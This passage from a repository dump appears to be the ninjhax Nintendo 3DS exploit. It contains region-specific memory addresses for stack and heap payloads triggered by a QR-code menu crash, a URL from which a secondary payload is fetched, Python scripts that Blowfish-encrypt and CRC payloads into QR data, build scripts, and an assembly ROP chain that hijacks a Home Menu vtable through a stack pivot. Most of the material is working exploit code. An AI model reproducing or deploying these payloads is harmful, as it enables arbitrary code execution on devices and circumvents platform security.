open(sys.argv[-1],"w").write(outputConstantsTxt(out)) 61 | -------------------------------------------------------------------------------- /scripts/blowfish.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import struct 4 | import ctypes 5 | 6 | def getWord(b, k, n=4): 7 | return sum(list(map(lambda c: b[k+c]<<(c*8),range(n)))) 8 | 9 | def loadSP(fn): 10 | f=open(fn,"rb") 11 | 12 | P=[] 13 | for i in range(18): 14 | P.append(struct.unpack("I",f.read(4))[0]) 15 | 16 | S=[[],[],[],[]] 17 | 18 | for i in range(4): 19 | for j in range(256): 20 | S[i].append(struct.unpack("I",f.read(4))[0]) 21 | 22 | f.close() 23 | 24 | return S, P 25 | 26 | # 2 functions stolen from http://felipetonello.com/scripts/python/blowfish.txt 27 | def F(S, P, xl): 28 | a = (xl & 0xFF000000) >> 24 29 | b = (xl & 0x00FF0000) >> 16 30 | c = (xl & 0x0000FF00) >> 8 31 | d = xl & 0x000000FF 32 | return ((S[0][a] + S[1][b]) ^ S[2][c]) + S[3][d]; 33 | 34 | def cipher(S, P, xl, xr, direction): 35 | if direction == 0: #ENCRYPT 36 | for i in range (16): 37 | xl = xl ^ P[i] 38 | xr = F(S,P,xl) ^ xr 39 | xl, xr = xr, xl 40 | xl, xr = xr, xl 41 | xr = xr ^ P[16] 42 | xl = xl ^ P[17] 43 | else: #DECRYPT 44 | for i in range (17, 1, -1): 45 | xl = xl ^ P[i] 46 | xr = F(S,P,xl) ^ xr 47 | xl, xr = xr, xl 48 | xl, xr = xr, xl 49 | xr = xr ^ P[1] 50 | xl = xl ^ P[0] 51 | return xl, xr 52 | 53 | def encrypt(din,dout): 54 | l=len(din) 55 | for k in range(0,l,8): 56 | l=getWord(din,k) 57 | r=getWord(din,k+4) 58 | ret=cipher(S,P,l,r,0) 59 | dout[(k):(k+4)]=struct.pack("I",ret[0]&0xFFFFFFFF) 60 | dout[(k+4):(k+8)]=struct.pack("I",ret[1]&0xFFFFFFFF) 61 | 62 | path="./" 63 | if len(sys.argv)>3: 64 | path=sys.argv[3] 65 | 66 | data=bytearray(open(sys.argv[1],"rb").read()) 67 | 68 | padding=8-(len(data)%8) 69 | for k in range(padding): 70 | data.append(0) 71 | 72 | dataOut=data[:] 73 | (S,P)=loadSP(path+"/blowfish_processed.bin") 74 | 
encrypt(data,dataOut) 75 | 76 | open(sys.argv[2],"wb").write(dataOut) 77 | -------------------------------------------------------------------------------- /cn_constants/WEST/constants.txt: -------------------------------------------------------------------------------- 1 | [ 2 | ("CN_GSPHEAP", "0x14000000"), 3 | 4 | ("CN_FSHANDLE_ADR", "0x00334828"), 5 | 6 | ("CN_GSPHANDLE_ADR", "0x00334F28"), 7 | ("CN_GSPSHAREDBUF_ADR", "(0x356208+0x58)"), 8 | 9 | ("CN_SRVHANDLE_ADR", "0x00334F6C"), 10 | 11 | ("CN_APTLOCKHANDLE_ADR", "0x00334720"), 12 | 13 | ("CN_HIDMEMHANDLE_ADR", "0x0034EC98"), 14 | ("CN_GSPMEMHANDLE_ADR", "0x00356254"), 15 | 16 | ("CN_DATABSS_START", "(0x0031A000)"), 17 | ("CN_DATABSS_SIZE", "(0x2773C+0x20070)"), 18 | 19 | ("CN_HEAPSIZE", "0x01d9a000"), 20 | 21 | ("CN_GSPGPU_FlushDataCache_ADR", "0x002D15D4"), 22 | ("CN_nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue", "0x001C2B54"), 23 | 24 | ("CN_INITIALCODE_OFFSET", "0x001D9700"), 25 | 26 | #for QR code menu crash 27 | ("CN_STACKPAYLOADADR_SAVE", "0x0FFFFA64"), 28 | ("CN_HEAPPAYLOADADR_SAVE", "0x8E3D968"), 29 | # for edit => my data menu crash 30 | # ("CN_STACKPAYLOADADR_SAVE", "0x0FFFFC5C"), 31 | # ("CN_HEAPPAYLOADADR_SAVE", "0x8F1D9C8"), 32 | 33 | ("CN_STACKPAYLOADADR", "0x0FFFFA64"), 34 | ("CN_HEAPPAYLOADADR", "0x8E3D968"), 35 | 36 | ("CN_CODELOCATIONPAOFF", "(0x100000)"), 37 | ("CN_CODELOCATIONGSP", "(CN_GSPHEAP+CN_CODELOCATIONPAOFF)"), 38 | 39 | ("CN_TOPFBADR1", "(0x1444B9C0)"), 40 | ("CN_TOPFBADR2", "(0x14491EE0)"), 41 | 42 | ("CN_TOTALPAGES", "0x262"), 43 | ("CN_ADDPAGES", "0x0"), 44 | ("CN_NEWTOTALPAGES", "(CN_TOTALPAGES+CN_ADDPAGES)"), 45 | ("CN_ALLOCPAGES_ADR", "0x138F0000"), 46 | 47 | ("CN_BOOTLOADER_LOC", "0x00100000"), 48 | ("CN_MENULOADER_LOC", "0x00101000"), 49 | ("CN_ARGSETTER_LOC", "0x00102000"), 50 | ("CN_ARGCV_LOC", "0x00103000"), 51 | ("CN_HBHANDLE_LOC", "0x00106000"), 52 | ("CN_SERVICESTRUCT_LOC", "0x00107000"), 53 | 54 | ("CN_3DSX_LOADADR", "0x00108000"), 55 | ("CN_TOTAL3DSXPAGES", 
"(CN_NEWTOTALPAGES-(CN_3DSX_LOADADR-0x00100000)/0x1000)"), 56 | 57 | # ("CN_NINJHAX_URL", "\"http://smealum.net/regionFOUR_dev/p/\"") 58 | ("CN_NINJHAX_URL", "\"http://192.168.109.1/\"") 59 | ] 60 | -------------------------------------------------------------------------------- /cn_constants/JPN/constants.txt: -------------------------------------------------------------------------------- 1 | [ 2 | ("CN_GSPHEAP", "0x14000000"), 3 | 4 | ("CN_FSHANDLE_ADR", "0x00341378"), 5 | 6 | ("CN_GSPHANDLE_ADR", "0x00341A78"), 7 | ("CN_GSPSHAREDBUF_ADR", "(0x362DA8+0x58)"), 8 | 9 | ("CN_SRVHANDLE_ADR", "0x00341AC0"), 10 | 11 | ("CN_APTLOCKHANDLE_ADR", "0x00341258"), 12 | 13 | ("CN_HIDMEMHANDLE_ADR", "0x0035B7C0"), 14 | ("CN_GSPMEMHANDLE_ADR", "0x00362DF4"), 15 | 16 | ("CN_DATABSS_START", "(0x00324000)"), 17 | ("CN_DATABSS_SIZE", "(0x0002A2A8+0x000200C4)"), 18 | 19 | ("CN_HEAPSIZE", "0x01D8D000"), 20 | 21 | ("CN_GSPGPU_FlushDataCache_ADR", "0x002DAAC4"), 22 | ("CN_nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue", "0x001C5B1C"), 23 | 24 | # careful about that as this address does contain some code/data 25 | ("CN_INITIALCODE_OFFSET", "0x00080000"), 26 | 27 | #for QR code menu crash 28 | ("CN_STACKPAYLOADADR_SAVE", "0x0FFFFA64"), 29 | ("CN_HEAPPAYLOADADR_SAVE", "0x8E3D968"), 30 | # for edit => my data menu crash 31 | # ("CN_STACKPAYLOADADR_SAVE", "0x0FFFFC5C"), 32 | # ("CN_HEAPPAYLOADADR_SAVE", "0x8F1D9C8"), 33 | 34 | ("CN_STACKPAYLOADADR", "0x0FFFFA64"), 35 | ("CN_HEAPPAYLOADADR", "0x8E3D928"), 36 | 37 | ("CN_CODELOCATIONPAOFF", "(0x100000)"), 38 | ("CN_CODELOCATIONGSP", "(CN_GSPHEAP+CN_CODELOCATIONPAOFF)"), 39 | 40 | ("CN_TOPFBADR1", "(0x1444B9C0)"), 41 | ("CN_TOPFBADR2", "(0x14491EE0)"), 42 | 43 | ("CN_TOTALPAGES", "0x26F"), 44 | ("CN_ADDPAGES", "0x0"), 45 | ("CN_NEWTOTALPAGES", "(CN_TOTALPAGES+CN_ADDPAGES)"), 46 | ("CN_ALLOCPAGES_ADR", "0x138F0000"), 47 | 48 | ("CN_BOOTLOADER_LOC", "0x00100000"), 49 | ("CN_MENULOADER_LOC", "0x00101000"), 50 | ("CN_ARGSETTER_LOC", "0x00102000"), 51 | 
("CN_ARGCV_LOC", "0x00103000"), 52 | ("CN_HBHANDLE_LOC", "0x00106000"), 53 | ("CN_SERVICESTRUCT_LOC", "0x00107000"), 54 | 55 | ("CN_3DSX_LOADADR", "0x00108000"), 56 | ("CN_TOTAL3DSXPAGES", "(CN_NEWTOTALPAGES-(CN_3DSX_LOADADR-0x00100000)/0x1000)"), 57 | 58 | ("CN_NINJHAX_URL", "\"http://smealum.net/regionfour/p/\"") 59 | ] 60 | -------------------------------------------------------------------------------- /web/qr_code.php: -------------------------------------------------------------------------------- 1 | $_POST['zero'], 68 | 1 => $_POST['one'], 69 | 2 => $_POST['two'], 70 | 3 => $_POST['three'], 71 | 4 => $_POST['four'], 72 | 5 => $_POST['five'] 73 | ); 74 | 75 | $filename="./unsupported.png"; 76 | 77 | // check that version is valid-ish 78 | if(is_numeric($version[0]) && is_numeric($version[1]) && is_numeric($version[2]) && is_numeric($version[3])) 79 | { 80 | $filename="./q/".getFirmVersion($version)."_".getCnVersion($version)."_".getMenuVersion($version).".png"; 81 | } 82 | 83 | if(!file_exists($filename)) 84 | { 85 | $filename="./unsupported.png"; 86 | } 87 | 88 | $fp = fopen($filename, 'rb'); 89 | 90 | // // send the right headers 91 | header("Content-Type: image/png"); 92 | header("Content-Length: " . 
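filesize($filename)); 93 | 94 | // dump the picture and stop the script 95 | fpassthru($fp); 96 | 97 | exit; 98 | 99 | ?> 100 |
--------------------------------------------------------------------------------
/scripts/buildVersion.py:
--------------------------------------------------------------------------------
"""Translate a version string into make variables and run the build.

argv[1] is the version in the form "X.X.X-XR", optionally prefixed with "N".
The optional flags --enableloadropbin and --enableotherapp append LOADROPBIN=1
and OTHERAPP=1 to the make command line.

The helpers below take the tuple
v = (major, minor, micro, nup version, region letter, new3DS flag).
"""
import sys
import os
import re


def getRoVersion(v):
    """Return the ROVERSION string for v, chosen from the major/minor numbers."""
    if v[0] < 4:
        return "0"
    elif v[0] < 5:
        return "1024"
    elif not (v[0] >= 7 and v[1] >= 2) and v[0] <= 7:
        return "2049"
    elif v[0] < 8:
        return "3074"
    else:
        return "4096"


def getMenuVersion(v):
    """Return the MENUVERSION string for v, or "unsupported"."""
    if v[0] != 9:
        return "unsupported"
    minor, region = v[1], v[4]
    by_minor = {
        0: "11272", 1: "11272",
        2: "12288",
        3: "13330", 4: "13330",
        5: "15360",
        6: "16404",
        7: "17415",
        8: "19456",
    }
    if minor in by_minor:
        return by_minor[minor]
    # Above 9.8 the result depends on the region letter.
    if minor >= 8 and region != "U":
        return "19456"
    if minor == 9 and region == "U":
        return "20480_usa"
    return "unsupported"


def getSpiderVersion(v):
    """Return the SPIDERVERSION string for v."""
    if v[5] == 1:
        return "SKATER_10"
    if v[3] < 7:
        return "1024"
    if v[3] < 11:
        return "2050"
    if v[3] < 16:
        return "3074"
    return "4096"


def getCnVersion(v):
    """Return "JPN" for region letter J, "WEST" otherwise."""
    return "JPN" if v[4] == "J" else "WEST"


def getFirmVersion(v):
    """Return "N3DS" when the new3DS flag is set, else "PRE5" or "POST5"."""
    if v[5] == 1:
        return "N3DS"
    return "PRE5" if v[0] < 5 else "POST5"


#format : "X.X.X-XR"
version = sys.argv[1]
# Raw string: "\." in a plain string literal is an invalid escape sequence.
# The pattern is anchored at the start only, so trailing text after the
# region letter is still accepted.
p = re.compile(r"^([N]?)([0-9]+)\.([0-9]+)\.([0-9]+)-([0-9]+)([EUJ])")
r = p.match(version)

if r:
    new3DS = (1 if (r.group(1) == "N") else 0)
    cverMajor = int(r.group(2))
    cverMinor = int(r.group(3))
    cverMicro = int(r.group(4))
    nupVersion = int(r.group(5))
    nupRegion = r.group(6)
    extraparams = ""
    for arg in sys.argv:
        if arg == "--enableloadropbin":
            extraparams += " LOADROPBIN=1"
        if arg == "--enableotherapp":
            extraparams += " OTHERAPP=1"
    v = (cverMajor, cverMinor, cverMicro, nupVersion, nupRegion, new3DS)
    # The raw version argument never reaches the shell: the command line is
    # assembled from the fixed strings the helpers return and the two literal
    # flag strings above.
    os.system("make clean")
    os.system("make CNVERSION="+getCnVersion(v)+" ROVERSION="+getRoVersion(v)+" SPIDERVERSION="+getSpiderVersion(v)+" FIRMVERSION="+getFirmVersion(v)+" MENUVERSION="+getMenuVersion(v)+extraparams)
else:
    print("invalid version format; learn2read.")
--------------------------------------------------------------------------------
/cn_qr_initial_loader/JPN/cn_initial/Makefile:
--------------------------------------------------------------------------------
1 | ifeq ($(strip $(DEVKITARM)),) 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=devkitARM") 3 | endif 4 | 5 | ifeq ($(strip $(CTRULIB)),) 6 | $(error "Please set CTRULIB in your environment. export DEVKITARM=ctrulib/libctru") 7 | endif 8 | 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),) 10 | export PATH:=$(DEVKITARM)/bin:$(PATH) 11 | endif 12 | 13 | CC = arm-none-eabi-gcc 14 | # LINK = arm-none-eabi-gcc 15 | LINK = arm-none-eabi-ld 16 | AS = arm-none-eabi-as 17 | OBJCOPY = arm-none-eabi-objcopy 18 | CFLAGS += -Wall -std=c99 -march=armv6 -Os -I"$(CTRULIB)/include" -I$(DEVKITPRO)/libnds/include 19 | LDFLAGS += --script=ccd00.ld -L"$(DEVKITARM)/arm-none-eabi/lib" -L"$(CTRULIB)/lib" -Map=output.map 20 | 21 | CFILES = $(wildcard source/*.c) 22 | BINFILES = $(wildcard data/*.bin) 23 | OFILES = $(BINFILES:data/%.bin=build/%.bin.o) 24 | OFILES += $(CFILES:source/%.c=build/%.o) 25 | DFILES = $(CFILES:source/%.c=build/%.d) 26 | SFILES = $(wildcard source/*.s) 27 | OFILES += $(SFILES:source/%.s=build/%.o) 28 | PROJECTNAME = ${shell basename "$(CURDIR)"} 29 | CWD = "$(CURDIR)"" 30 | 31 | #--------------------------------------------------------------------------------- 32 | # canned command sequence for binary data, taken from devkitARM 33 |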
#--------------------------------------------------------------------------------- 34 | define bin2o 35 | bin2s $< | $(AS) -o $(@) 36 | echo "extern const u8" `(echo $( source/`(echo $(> source/`(echo $(> source/`(echo $( build/$*.d 67 | 68 | build/%.o: source/%.s 69 | $(CC) $(CFLAGS) -c $< -o $@ 70 | @$(CC) -MM $< > build/$*.d 71 | 72 | build/%.bin.o: data/%.bin 73 | @echo $(notdir $<) 74 | @$(bin2o) 75 | -------------------------------------------------------------------------------- /cn_qr_initial_loader/WEST/cn_initial/Makefile: -------------------------------------------------------------------------------- 1 | ifeq ($(strip $(DEVKITARM)),) 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=devkitARM") 3 | endif 4 | 5 | ifeq ($(strip $(CTRULIB)),) 6 | $(error "Please set CTRULIB in your environment. export DEVKITARM=ctrulib/libctru") 7 | endif 8 | 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),) 10 | export PATH:=$(DEVKITARM)/bin:$(PATH) 11 | endif 12 | 13 | CC = arm-none-eabi-gcc 14 | # LINK = arm-none-eabi-gcc 15 | LINK = arm-none-eabi-ld 16 | AS = arm-none-eabi-as 17 | OBJCOPY = arm-none-eabi-objcopy 18 | CFLAGS += -Wall -std=c99 -march=armv6 -Os -I"$(CTRULIB)/include" -I$(DEVKITPRO)/libnds/include 19 | LDFLAGS += --script=ccd00.ld -L"$(DEVKITARM)/arm-none-eabi/lib" -L"$(CTRULIB)/lib" -Map=output.map 20 | 21 | CFILES = $(wildcard source/*.c) 22 | BINFILES = $(wildcard data/*.bin) 23 | OFILES = $(BINFILES:data/%.bin=build/%.bin.o) 24 | OFILES += $(CFILES:source/%.c=build/%.o) 25 | DFILES = $(CFILES:source/%.c=build/%.d) 26 | SFILES = $(wildcard source/*.s) 27 | OFILES += $(SFILES:source/%.s=build/%.o) 28 | PROJECTNAME = ${shell basename "$(CURDIR)"} 29 | CWD = "$(CURDIR)"" 30 | 31 | #--------------------------------------------------------------------------------- 32 | # canned command sequence for binary data, taken from devkitARM 33 | #--------------------------------------------------------------------------------- 34 | define bin2o 35 
| bin2s $< | $(AS) -o $(@) 36 | echo "extern const u8" `(echo $( source/`(echo $(> source/`(echo $(> source/`(echo $( build/$*.d 67 | 68 | build/%.o: source/%.s 69 | $(CC) $(CFLAGS) -c $< -o $@ 70 | @$(CC) -MM $< > build/$*.d 71 | 72 | build/%.bin.o: data/%.bin 73 | @echo $(notdir $<) 74 | @$(bin2o) 75 | -------------------------------------------------------------------------------- /cn_save_initial_loader/JPN/cn_initial/Makefile: -------------------------------------------------------------------------------- 1 | ifeq ($(strip $(DEVKITARM)),) 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=devkitARM") 3 | endif 4 | 5 | ifeq ($(strip $(CTRULIB)),) 6 | $(error "Please set CTRULIB in your environment. export DEVKITARM=ctrulib/libctru") 7 | endif 8 | 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),) 10 | export PATH:=$(DEVKITARM)/bin:$(PATH) 11 | endif 12 | 13 | CC = arm-none-eabi-gcc 14 | # LINK = arm-none-eabi-gcc 15 | LINK = arm-none-eabi-ld 16 | AS = arm-none-eabi-as 17 | OBJCOPY = arm-none-eabi-objcopy 18 | CFLAGS += -Wall -std=c99 -march=armv6 -Os -I"$(CTRULIB)/include" -I$(DEVKITPRO)/libnds/include 19 | LDFLAGS += --script=ccd00.ld -L"$(DEVKITARM)/arm-none-eabi/lib" -L"$(CTRULIB)/lib" -Map=output.map 20 | 21 | CFILES = $(wildcard source/*.c) 22 | BINFILES = $(wildcard data/*.bin) 23 | OFILES = $(BINFILES:data/%.bin=build/%.bin.o) 24 | OFILES += $(CFILES:source/%.c=build/%.o) 25 | DFILES = $(CFILES:source/%.c=build/%.d) 26 | SFILES = $(wildcard source/*.s) 27 | OFILES += $(SFILES:source/%.s=build/%.o) 28 | PROJECTNAME = ${shell basename "$(CURDIR)"} 29 | CWD = "$(CURDIR)"" 30 | 31 | #--------------------------------------------------------------------------------- 32 | # canned command sequence for binary data, taken from devkitARM 33 | #--------------------------------------------------------------------------------- 34 | define bin2o 35 | bin2s $< | $(AS) -o $(@) 36 | echo "extern const u8" `(echo $( source/`(echo $(> source/`(echo $(> 
source/`(echo $( build/$*.d 67 | 68 | build/%.o: source/%.s 69 | $(CC) $(CFLAGS) -c $< -o $@ 70 | @$(CC) -MM $< > build/$*.d 71 | 72 | build/%.bin.o: data/%.bin 73 | @echo $(notdir $<) 74 | @$(bin2o) 75 | -------------------------------------------------------------------------------- /cn_save_initial_loader/WEST/cn_initial/Makefile: -------------------------------------------------------------------------------- 1 | ifeq ($(strip $(DEVKITARM)),) 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=devkitARM") 3 | endif 4 | 5 | ifeq ($(strip $(CTRULIB)),) 6 | $(error "Please set CTRULIB in your environment. export DEVKITARM=ctrulib/libctru") 7 | endif 8 | 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),) 10 | export PATH:=$(DEVKITARM)/bin:$(PATH) 11 | endif 12 | 13 | CC = arm-none-eabi-gcc 14 | # LINK = arm-none-eabi-gcc 15 | LINK = arm-none-eabi-ld 16 | AS = arm-none-eabi-as 17 | OBJCOPY = arm-none-eabi-objcopy 18 | CFLAGS += -Wall -std=c99 -march=armv6 -Os -I"$(CTRULIB)/include" -I$(DEVKITPRO)/libnds/include 19 | LDFLAGS += --script=ccd00.ld -L"$(DEVKITARM)/arm-none-eabi/lib" -L"$(CTRULIB)/lib" -Map=output.map 20 | 21 | CFILES = $(wildcard source/*.c) 22 | BINFILES = $(wildcard data/*.bin) 23 | OFILES = $(BINFILES:data/%.bin=build/%.bin.o) 24 | OFILES += $(CFILES:source/%.c=build/%.o) 25 | DFILES = $(CFILES:source/%.c=build/%.d) 26 | SFILES = $(wildcard source/*.s) 27 | OFILES += $(SFILES:source/%.s=build/%.o) 28 | PROJECTNAME = ${shell basename "$(CURDIR)"} 29 | CWD = "$(CURDIR)"" 30 | 31 | #--------------------------------------------------------------------------------- 32 | # canned command sequence for binary data, taken from devkitARM 33 | #--------------------------------------------------------------------------------- 34 | define bin2o 35 | bin2s $< | $(AS) -o $(@) 36 | echo "extern const u8" `(echo $( source/`(echo $(> source/`(echo $(> source/`(echo $( build/$*.d 67 | 68 | build/%.o: source/%.s 69 | $(CC) $(CFLAGS) -c $< -o $@ 70 | 
@$(CC) -MM $< > build/$*.d 71 | 72 | build/%.bin.o: data/%.bin 73 | @echo $(notdir $<) 74 | @$(bin2o) 75 | -------------------------------------------------------------------------------- /cn_secondary_payload/Makefile: -------------------------------------------------------------------------------- 1 | ifeq ($(strip $(DEVKITARM)),) 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=devkitARM") 3 | endif 4 | 5 | ifeq ($(strip $(CTRULIB)),) 6 | $(error "Please set CTRULIB in your environment. export DEVKITARM=ctrulib/libctru") 7 | endif 8 | 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),) 10 | export PATH:=$(DEVKITARM)/bin:$(PATH) 11 | endif 12 | 13 | DEFINES := 14 | LDPATH := ccd00.ld 15 | 16 | ifneq ($(strip $(LOADROPBIN)),) 17 | DEFINES := $(DEFINES) -DLOADROPBIN=1 18 | endif 19 | 20 | ifneq ($(strip $(OTHERAPP)),) 21 | DEFINES := $(DEFINES) -DOTHERAPP=1 22 | LDPATH := otherapp.ld 23 | endif 24 | 25 | CC = arm-none-eabi-gcc 26 | # LINK = arm-none-eabi-gcc 27 | LINK = arm-none-eabi-ld 28 | AS = arm-none-eabi-as 29 | OBJCOPY = arm-none-eabi-objcopy 30 | CFLAGS += -Wall -std=c99 -march=armv6 -Os -I"$(CTRULIB)/include" -I$(DEVKITPRO)/libnds/include $(DEFINES) 31 | LDFLAGS += --script=$(LDPATH) -L"$(DEVKITARM)/arm-none-eabi/lib" -L"$(CTRULIB)/lib" -Map=output.map 32 | 33 | CFILES = $(wildcard source/*.c) 34 | BINFILES = $(wildcard data/*.bin) 35 | OFILES = $(BINFILES:data/%.bin=build/%.bin.o) 36 | OFILES += $(CFILES:source/%.c=build/%.o) 37 | DFILES = $(CFILES:source/%.c=build/%.d) 38 | SFILES = $(wildcard source/*.s) 39 | OFILES += $(SFILES:source/%.s=build/%.o) 40 | PROJECTNAME = ${shell basename "$(CURDIR)"} 41 | CWD = "$(CURDIR)"" 42 | 43 | #--------------------------------------------------------------------------------- 44 | # canned command sequence for binary data, taken from devkitARM 45 | #--------------------------------------------------------------------------------- 46 | define bin2o 47 | bin2s $< | $(AS) -o $(@) 48 | echo "extern 
const u8" `(echo $( source/`(echo $(> source/`(echo $(> source/`(echo $( build/$*.d 77 | 78 | build/%.o: source/%.s 79 | $(CC) $(CFLAGS) -c $< -o $@ 80 | @$(CC) $(DEFINES) -MM $< > build/$*.d 81 | 82 | build/%.bin.o: data/%.bin 83 | @echo $(notdir $<) 84 | @$(bin2o) 85 | 86 | -------------------------------------------------------------------------------- /scripts/crypt.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import struct 4 | import ctypes 5 | import compress 6 | #compress.py from https://github.com/magical/nlzss/blob/master/compress.py 7 | #slightly modified padding 8 | 9 | def getWord(b, k, n=4): 10 | return sum(list(map(lambda c: b[k+c]<<(c*8),range(n)))) 11 | 12 | def loadSP(fn): 13 | f=open(fn,"rb") 14 | 15 | P=[] 16 | for i in range(18): 17 | P.append(struct.unpack("I",f.read(4))[0]) 18 | 19 | S=[[],[],[],[]] 20 | 21 | for i in range(4): 22 | for j in range(256): 23 | S[i].append(struct.unpack("I",f.read(4))[0]) 24 | 25 | f.close() 26 | 27 | return S, P 28 | 29 | # 2 functions stolen from http://felipetonello.com/scripts/python/blowfish.txt 30 | def F(S, P, xl): 31 | a = (xl & 0xFF000000) >> 24 32 | b = (xl & 0x00FF0000) >> 16 33 | c = (xl & 0x0000FF00) >> 8 34 | d = xl & 0x000000FF 35 | return ((S[0][a] + S[1][b]) ^ S[2][c]) + S[3][d]; 36 | 37 | def cipher(S, P, xl, xr, direction): 38 | if direction == 0: #ENCRYPT 39 | for i in range (16): 40 | xl = xl ^ P[i] 41 | xr = F(S,P,xl) ^ xr 42 | xl, xr = xr, xl 43 | xl, xr = xr, xl 44 | xr = xr ^ P[16] 45 | xl = xl ^ P[17] 46 | else: #DECRYPT 47 | for i in range (17, 1, -1): 48 | xl = xl ^ P[i] 49 | xr = F(S,P,xl) ^ xr 50 | xl, xr = xr, xl 51 | xl, xr = xr, xl 52 | xr = xr ^ P[1] 53 | xl = xl ^ P[0] 54 | return xl, xr 55 | 56 | def encrypt(din,dout): 57 | l=len(din) 58 | for k in range(0,l,8): 59 | l=getWord(din,k) 60 | r=getWord(din,k+4) 61 | ret=cipher(S,P,l,r,0) 62 | dout[(k):(k+4)]=struct.pack("I",ret[0]&0xFFFFFFFF) 63 | 
dout[(k+4):(k+8)]=struct.pack("I",ret[1]&0xFFFFFFFF) 64 | 65 | def calcCRC(d): 66 | l=len(d) 67 | R3=0x04C11DB7 68 | R0=0xFFFFFFFF 69 | for R2 in range(l): 70 | R1=d[R2] 71 | R0=R0^(R1<<24) 72 | for R1 in range(8): 73 | if R0&0x80000000==0: 74 | R0=R0<<1 75 | else: 76 | R0=R3^(R0<<1) 77 | R0=R0&0xFFFFFFFF 78 | return ctypes.c_uint(~R0).value 79 | 80 | path="./" 81 | if len(sys.argv)>2: 82 | path=sys.argv[2] 83 | 84 | data=bytearray(open(sys.argv[1],"rb").read()) 85 | padding=compress.compress(data, open("tmp","wb")) 86 | 87 | cdata=bytearray(open("tmp","rb").read()) 88 | crc=calcCRC(cdata[0:(len(cdata)-padding)]) 89 | 90 | data=bytearray(len(cdata)+7) 91 | data[0x7:(0x7+len(cdata))]=cdata[:] 92 | data[0x3]=(crc)&0xFF 93 | data[0x4]=(crc>>8)&0xFF 94 | data[0x5]=(crc>>16)&0xFF 95 | data[0x6]=(crc>>24)&0xFF 96 | 97 | #data[0x1] and data[0x2] : unused ? 98 | 99 | data[0x0]=0x80|(padding&0x7) 100 | 101 | dataOut=data[:] 102 | 103 | (S,P)=loadSP(path+"/blowfish_processed.bin") 104 | encrypt(data,dataOut) 105 | 106 | #weird quirk 107 | l=len(dataOut) 108 | v=dataOut[0x00] 109 | dataOut[0x00]=dataOut[0x01] 110 | dataOut[0x01]=dataOut[l-1] 111 | dataOut[l-1]=v 112 | 113 | # v=len(data) 114 | # l=[] 115 | # while v!=0x00: 116 | # l.insert(0,v&0xf) 117 | # v=v>>4 118 | # if len(l)%2!=0: 119 | # l.insert(0,0x0) 120 | # l.insert(0,0x4) 121 | 122 | # v=0 123 | # for k in range(1,len(l),2): 124 | # dataOut.insert(0,(l[k]<<4)|l[k+1]) 125 | # dataOut.insert(0,0x04) 126 | 127 | # l=len(dataOut) 128 | # dataQr=dataOut[:] 129 | # for k in range(1,l-1): 130 | # dataQr[k-1]=(((dataOut[k-1]&0xF)<<4)|((dataOut[k]>>4)&0xF)) 131 | # open(sys.argv[1]+".out","wb").write(dataQr) 132 | 133 | # open("debug","wb").write(data) 134 | open("tmp","wb").write(dataOut) 135 | # os.system(path+"/qrcode.exe -8 -o "+sys.argv[1]+".png < tmp") 136 | -------------------------------------------------------------------------------- /menu_payload/menu_payload_regionfree.s: 
-------------------------------------------------------------------------------- 1 | .nds 2 | 3 | .include "../build/constants.s" 4 | 5 | .create "menu_payload_regionfree.bin",0x0 6 | 7 | MENU_OBJECT_LOC equ 0xBABE0000 ; for relocation 8 | 9 | MENU_PAD equ 0x1000001C 10 | MENU_KEYCOMBO equ 0x00000008 ; START 11 | MENU_SLEEP equ ROP_MENU_SLEEPTHREAD 12 | 13 | ; basically we overwrite an object's data to get home menu to do what we want 14 | ; first we overwrite the vtable pointer so that we can get the code to jump to where we want 15 | ; the method we use for that is located at vtable + 0x8 16 | ; with that we can put a in our vtable to our stack pivot 17 | ; our stack pivot works by loading a bunch of registers from [r4] 18 | ; fortunately we know r4 = object + 0x4, so we manufacture our object accordingly 19 | ; and then we get ROP under home menu ! from there we wait for keypress and then do ns:s reboot 20 | 21 | .orga 0x0 22 | 23 | object: 24 | .word MENU_OBJECT_LOC + vtable - object ; pointer to manufactured vtable, and new sp 25 | .word ROP_MENU_POP_PC ; pc (pop {pc} to jump to ROP) 26 | 27 | .word 0xDEADCAFE ; filler to avoid having stuff overwritten 28 | .word 0xDEADCAFE ; filler to avoid having stuff overwritten 29 | .word 0xDEADCAFE ; filler to avoid having stuff overwritten 30 | .word 0xDEADCAFE ; filler to avoid having stuff overwritten 31 | 32 | vtable: ; also initial ROP 33 | .word ROP_MENU_POP_R4R5PC ; pop {r4, r5, pc} : skip pivot 34 | .word 0xDEADBABE ; r4 (garbage) 35 | .word ROP_MENU_STACK_PIVOT ; stack pivot ; also r5 (garbage) 36 | rop: ; real ROP starts here 37 | ; loop until keycombo pressed 38 | rop_MENU_loop: 39 | ; load current PAD value 40 | .word ROP_MENU_POP_R0PC ; pop {r0, pc} 41 | .word MENU_PAD ; r0 (PAD) 42 | .word ROP_MENU_LDR_R0R0_POP_R4PC ; ldr r0, [r0] ; pop {r4, pc} 43 | .word MENU_KEYCOMBO ; r4 (keycombo) 44 | ; mask it with desired key combo 45 | .word ROP_MENU_AND_R0R0R4_POP_R4R5R6R7R8PC ; and r0, r0, r4 ; pop {r4, r5, r6, 
